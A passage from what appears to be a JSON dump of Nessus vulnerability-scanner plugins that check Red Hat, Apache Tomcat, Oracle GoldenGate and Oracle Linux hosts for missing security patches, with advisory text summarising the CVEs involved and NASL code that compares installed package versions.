"p-cpe:/a:redhat:enterprise_linux:tomcat7-webapps", "p-cpe:/a:redhat:enterprise_linux:tomcat8", "p-cpe:/a:redhat:enterprise_linux:tomcat8-admin-webapps", "p-cpe:/a:redhat:enterprise_linux:tomcat8-docs-webapp", "p-cpe:/a:redhat:enterprise_linux:tomcat8-el-2.2-api", "p-cpe:/a:redhat:enterprise_linux:tomcat8-javadoc", "p-cpe:/a:redhat:enterprise_linux:tomcat8-jsp-2.3-api", "p-cpe:/a:redhat:enterprise_linux:tomcat8-jsvc", "p-cpe:/a:redhat:enterprise_linux:tomcat8-lib", "p-cpe:/a:redhat:enterprise_linux:tomcat8-log4j", "p-cpe:/a:redhat:enterprise_linux:tomcat8-selinux", "p-cpe:/a:redhat:enterprise_linux:tomcat8-servlet-3.1-api", "p-cpe:/a:redhat:enterprise_linux:tomcat8-webapps", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2018-2469.NASL", "href": "https://www.tenable.com/plugins/nessus/111804", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:2469. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111804);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:45\");\n\n script_cve_id(\"CVE-2018-8014\", \"CVE-2018-8019\", \"CVE-2018-8020\");\n script_xref(name:\"RHSA\", value:\"2018:2469\");\n\n script_name(english:\"RHEL 6 / 7 : Red Hat JBoss Web Server 3.1.0 Service Pack 4 (RHSA-2018:2469)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update is now available for Red Hat JBoss Web Server 3.1 for RHEL 6\nand Red Hat JBoss Web Server 3.1 for RHEL 7.\n\nRed Hat Product Security has rated this release as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the\nApache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat\nConnector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and\nthe Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1 Service Pack 4 serves as\na replacement for Red Hat JBoss Web Server 3.1, and includes bug\nfixes, which are documented in the Release Notes document linked to in\nthe References.\n\nSecurity Fix(es) :\n\n* tomcat: Insecure defaults in CORS filter enable\n'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat-native: Mishandled OCSP invalid response (CVE-2018-8019)\n\n* tomcat-native: Mishandled OCSP responses can allow clients to\nauthenticate with revoked certificates (CVE-2018-8020)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nThe following packages have been upgraded to a newer upstream \nversion :\n\n* OpenSSL (1.0.2n)\n\n* APR (1.6.3)\n\nCVE-2018-8019 and CVE-2018-8020 were discovered by Coty Sutherland\n(Red Hat).\"\n );\n # https://access.redhat.com/documentation/en-us/red_hat_jboss_web_server/3.1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0349df1b\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:2469\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-8014\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-8019\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-8020\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-native-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:2469\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"tomcat-native-1.2.17-17.redhat_17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"tomcat-native-1.2.17-17.redhat_17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"tomcat-native-debuginfo-1.2.17-17.redhat_17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"tomcat-native-debuginfo-1.2.17-17.redhat_17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-admin-webapps-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-docs-webapp-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-el-2.2-api-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-javadoc-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-jsp-2.2-api-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-jsvc-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-lib-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-log4j-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-selinux-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-servlet-3.0-api-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-webapps-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-admin-webapps-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-docs-webapp-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-el-2.2-api-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-javadoc-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-jsp-2.3-api-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-jsvc-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-lib-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-log4j-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-selinux-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-servlet-3.1-api-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-webapps-8.0.36-31.ep7.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"tomcat-native-1.2.17-17.redhat_17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"tomcat-native-debuginfo-1.2.17-17.redhat_17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-admin-webapps-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-docs-webapp-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-el-2.2-api-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-javadoc-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-jsp-2.2-api-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-jsvc-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-lib-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-log4j-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-selinux-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-servlet-3.0-api-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-webapps-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-admin-webapps-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-docs-webapp-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-el-2.2-api-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-javadoc-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-jsp-2.3-api-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-jsvc-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-lib-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-log4j-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-selinux-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-servlet-3.1-api-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-webapps-8.0.36-31.ep7.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat-native / tomcat-native-debuginfo / tomcat7 / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:27", "description": "The version of Apache Tomcat installed on the remote host is 8.5.x prior to 8.5.32. It is, therefore, affected by multiple vulnerabilities.", "cvss3": {}, "published": "2018-07-13T00:00:00", "type": "nessus", "title": "Apache Tomcat 8.5.0 < 8.5.32 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_8_5_32.NASL", "href": "https://www.tenable.com/plugins/nessus/111068", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111068);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n script_bugtraq_id(104203);\n\n script_name(english:\"Apache Tomcat 8.5.0 < 8.5.32 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 8.5.x\nprior to 8.5.32. It is, therefore, affected by multiple\nvulnerabilities.\");\n # http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.32\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5070a438\");\n # https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d5ab19d6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 8.5.32 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\ntomcat_check_version(fixed:\"8.5.32\", min:\"8.5.0\", severity:SECURITY_HOLE, granularity_regex:\"^8(\\.5)?$\");\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-09T14:39:36", "description": "The version of Oracle GoldenGate for Big Data application located on the remote host is 12.2.0.1.x less than 12.2.0.1.10 or 12.3.1.1.x less than 12.3.1.1.6. It is, therefore, affected by multiple vulnerabilities : \n\n - An unspecified vulnerability exists in Oracle GoldenGate for Big Data. An authenticated, remote attacker can exploit this, via unknown vectors, to compromise confidentiality, integrity, and availability.\n (CVE-2016-0635)\n\n - An authorization bypass vulnerability exists in Spring Framework 5.0.5 when used in conjunction with Spring Security and using method security. An authenticated, remote attacker can exploit this to gain unauthorized access to methods that should be restricted. (CVE-2018-1258)\n\n - A remote code execution vulnerability exists in the Spring Framework. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands. (CVE-2018-1275)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-03-05T00:00:00", "type": "nessus", "title": "Oracle GoldenGate for Big Data 12.2.0.1.x < 12.2.0.1.10 / 12.3.1.1.x < 12.3.1.1.6 Multiple Vulnerabilities (Oct 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0635", "CVE-2018-1258", "CVE-2018-1275"], "modified": "2022-05-18T00:00:00", "cpe": ["cpe:/a:oracle:goldengate_application_adapters"], "id": "ORACLE_GOLDENGATE_FOR_BIG_DATA_CPU_OCT_2018.NASL", "href": "https://www.tenable.com/plugins/nessus/134225", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134225);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/18\");\n\n script_cve_id(\"CVE-2016-0635\", \"CVE-2018-1258\", \"CVE-2018-1275\");\n script_bugtraq_id(91869, 103771, 104222);\n\n script_name(english:\"Oracle GoldenGate for Big Data 12.2.0.1.x < 12.2.0.1.10 / 12.3.1.1.x < 12.3.1.1.6 Multiple Vulnerabilities (Oct 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Oracle GoldenGate for Big Data application on the remote host is affected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle GoldenGate for Big Data application located on the remote host is 12.2.0.1.x less than\n12.2.0.1.10 or 12.3.1.1.x less than 12.3.1.1.6. It is, therefore, affected by multiple vulnerabilities : \n\n - An unspecified vulnerability exists in Oracle GoldenGate for Big Data. An authenticated, remote attacker\n can exploit this, via unknown vectors, to compromise confidentiality, integrity, and availability.\n (CVE-2016-0635)\n\n - An authorization bypass vulnerability exists in Spring Framework 5.0.5 when used in conjunction with\n Spring Security and using method security. An authenticated, remote attacker can exploit this to gain\n unauthorized access to methods that should be restricted. (CVE-2018-1258)\n\n - A remote code execution vulnerability exists in the Spring Framework. An unauthenticated, remote attacker\n can exploit this to bypass authentication and execute arbitrary commands. (CVE-2018-1275)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuoct2018.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patches according to the October 2018 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0635\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-1275\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/05\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:goldengate_application_adapters\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_goldengate_for_big_data_installed.nbin\");\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/Oracle GoldenGate for Big Data\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\n// Paranoid because the detection is looking for the presence of JAR files. It's possible that the customer has JAR\n// files from outdated versions on their system, but is not currently using them.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp_name = 'Oracle GoldenGate for Big Data';\napp_info = vcf::get_app_info(app:app_name);\n\nconstraints = [\n { 'min_version':'12.2.0.1', 'fixed_version':'12.2.0.1.10' },\n { 'min_version':'12.3.1.1', 'fixed_version':'12.3.1.1.6' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-10T18:03:04", "description": "The remote Oracle Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the ELSA-2019-2205 advisory.\n\n - The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue. (CVE-2018-8014)\n\n - The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88. (CVE-2018-8034)\n\n - The URL pattern of (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected. (CVE-2018-1304)\n\n - Security constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied.\n This could have exposed resources to users who were not authorised to access them. (CVE-2018-1305)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-09-07T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : tomcat (ELSA-2019-2205)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1304", "CVE-2018-1305", "CVE-2018-8014", "CVE-2018-8034"], "modified": "2023-09-07T00:00:00", "cpe": ["cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:tomcat", "p-cpe:/a:oracle:linux:tomcat-admin-webapps", "p-cpe:/a:oracle:linux:tomcat-docs-webapp", "p-cpe:/a:oracle:linux:tomcat-el-2.2-api", "p-cpe:/a:oracle:linux:tomcat-javadoc", "p-cpe:/a:oracle:linux:tomcat-jsp-2.2-api", "p-cpe:/a:oracle:linux:tomcat-jsvc", "p-cpe:/a:oracle:linux:tomcat-lib", "p-cpe:/a:oracle:linux:tomcat-servlet-3.0-api", "p-cpe:/a:oracle:linux:tomcat-webapps"], "id": "ORACLELINUX_ELSA-2019-2205.NASL", "href": "https://www.tenable.com/plugins/nessus/180856", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2019-2205.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(180856);\n script_version(\"1.0\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/07\");\n\n script_cve_id(\n \"CVE-2018-1304\",\n \"CVE-2018-1305\",\n \"CVE-2018-8014\",\n \"CVE-2018-8034\"\n );\n script_xref(name:\"IAVB\", value:\"2018-B-0028-S\");\n script_xref(name:\"IAVB\", value:\"2018-B-0080-S\");\n script_xref(name:\"IAVB\", value:\"2018-B-0095-S\");\n\n script_name(english:\"Oracle Linux 7 : tomcat (ELSA-2019-2205)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", 